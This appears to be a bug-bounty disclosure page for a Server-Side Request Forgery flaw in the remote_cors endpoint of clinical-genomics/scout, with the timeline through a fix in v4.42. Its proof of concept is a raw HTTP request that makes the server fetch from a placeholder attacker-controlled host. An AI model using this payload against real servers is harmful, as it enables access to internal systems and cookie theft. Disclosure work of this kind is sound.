Server-Side Request Forgery in scout in clinical-genomics/scout

Valid

Reported on

May 3rd 2022


Description

Server-Side Request Forgery in remote_cors

Proof of Concept

GET /remote/cors/http://<my-vps>:8888 HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8000/cust000/cases
Cookie: <cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1


Impact

An attacker could make the application perform arbitrary requests for phishing or cookie theft, send requests to private areas, or cause XSS...

We are processing your report and will contact the clinical-genomics/scout team within 24 hours. 2 years ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 2 years ago
Nhien.IT modified the report
2 years ago
Nhien.IT modified the report
2 years ago
Nhien.IT modified the report
2 years ago
We have contacted a member of the clinical-genomics/scout team and are waiting to hear back 2 years ago
Chiara Rasi validated this vulnerability 2 years ago
nhienit2010 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Chiara Rasi marked this as fixed in v4.42 with commit b0ef15 2 years ago
Chiara Rasi has been awarded the fix bounty
Nhien.IT
2 years ago

Researcher


Hi @maintainer, the fix is already released, can you assign a CVE here? If you can, hope @admin help

Jamie Slome
2 years ago

Sorted 👍
